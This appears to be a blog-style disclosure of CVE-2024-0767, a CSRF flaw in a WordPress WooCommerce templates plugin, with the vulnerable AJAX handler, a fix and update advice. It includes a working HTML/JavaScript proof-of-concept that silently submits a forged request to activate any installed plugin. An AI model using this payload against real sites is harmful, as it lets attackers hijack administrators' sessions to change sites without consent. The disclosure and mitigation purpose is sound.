CVE-2024-0767 - CSRF Vulnerability in Envo’s Elementor Templates & Widgets for WooCommerce Plugin (WordPress, <= 1.4.4) – Details, Exploit, and Mitigation

The Envo's Elementor Templates & Widgets for WooCommerce plugin, a popular WordPress extension with thousands of installations, has been found vulnerable to a Cross-Site Request Forgery (CSRF) attack in versions up to and including 1.4.4. Tracked as CVE-2024-0767, this issue can let attackers activate *any* installed plugin on a target website if they can trick an authenticated admin into clicking a malicious link.

This post breaks down how the vulnerability works, demonstrates how it can be exploited, and provides references for site owners and security researchers.

What is Cross-Site Request Forgery (CSRF)?

CSRF lets an attacker trick a logged-in user (such as a WordPress admin) into unknowingly triggering actions in their account. With weak protection, attacker can make an authenticated action, such as enabling a plugin, by getting the admin to click or load a crafted URL.

Vulnerability Details

Plugin: Envo's Elementor Templates & Widgets for WooCommerce
Vulnerable Versions: 1.4.4 and below
Fixed Version: 1.4.5
Vulnerability Type: Cross-Site Request Forgery (CSRF)
CVE Identifier: CVE-2024-0767
Original Advisory:
- WPScan Details page
- NVD Entry

The core issue is in the plugin's AJAX handler function ajax_plugin_activation. This function lets administrators activate plugins via AJAX but fails to verify a WordPress anti-CSRF "nonce".

Why is this a problem?
Without a valid nonce check, *any webpage, even outside of your own site*, can craft a request that causes critical actions to happen if the admin is currently logged in and interacts with a malicious page.

A simplified version of the vulnerable function might look like this

// File: includes/class-admin.php

public function ajax_plugin_activation() {
    // (VULNERABLE!) Missing nonce check here
    $plugin_slug = isset($_POST['plugin_slug']) ? sanitize_text_field($_POST['plugin_slug']) : '';

    if (!current_user_can('activate_plugins')) {
        wp_send_json_error('Permission denied');
    }

    $result = activate_plugin($plugin_slug);

    if (is_wp_error($result)) {
        wp_send_json_error($result->get_error_message());
    } else {
        wp_send_json_success('Plugin activated');
    }
}
add_action('wp_ajax_envo_activate_plugin', [$this, 'ajax_plugin_activation']);

What’s missing?
There should be a check_ajax_referer (which enforces the nonce) call at the start to stop requests without the correct token.

Imagine a scenario

1. The attacker *knows* the admin can be tricked to visit a page controlled by them (phishing email, malicious ad, etc.).
2. The attacker creates a malicious web page or email that automatically sends a POST request, via JavaScript or HTML form, to the vulnerable site's AJAX endpoint.
3. If the admin is logged into WordPress, the request will *succeed*, activating any installed plugin that the attacker specifies.

Example Exploit in HTML/JavaScript

<!-- Malicious page crafted by attacker -->
<html>
  <body>
    <form action="https://victim-site.com/wp-admin/admin-ajax.php"; method="POST" id="csrf-form">
      <input type="hidden" name="action" value="envo_activate_plugin">
      <input type="hidden" name="plugin_slug" value="evil-plugin/evil-plugin.php">
    </form>
    <script>
      document.getElementById('csrf-form').submit();
    </script>
  </body>
</html>

*Note: "evil-plugin/evil-plugin.php" can be replaced with the slug of any already-installed plugin.*

What could go wrong?

Status: Fixed in version 1.4.5 of the plugin.

If you use Envo’s Elementor Templates & Widgets for WooCommerce plugin, update immediately to the latest version.

Proper Fix (For Developers):

The fix is to add a standard nonce check

public function ajax_plugin_activation() {
    check_ajax_referer('envo_plugin_nonce'); // Ensures request is legitimate

    // ...rest of code
}

More About the Bug

Why is CSRF so dangerous on plugin activation?
CSRF is especially critical when it allows plugin activation since it can give attackers a way to run code—even if file uploads are locked down. It also has post-exploitation uses: an attacker uploads a malicious plugin (or uses an existing vulnerable one) and then tricks any admin into activating it later via CSRF.

References & Further Reading

- Official plugin page
- NVD CVE-2024-0767 Entry
- WPScan Advisory
- How CSRF Attacks Work (OWASP)

Conclusion

CVE-2024-0767 is a critical reminder: *never* trust incoming requests without proper anti-CSRF protection, especially for powerful admin actions like plugin activation. All WordPress admins using the affected plugin should update ASAP, and developers should always validate nonces in custom AJAX handlers.


*Thanks for reading. Stay safe, and always keep your plugins updated!*

Timeline

Published on: 02/28/2024 09:15:41 UTC
Last modified on: 02/28/2024 14:06:45 UTC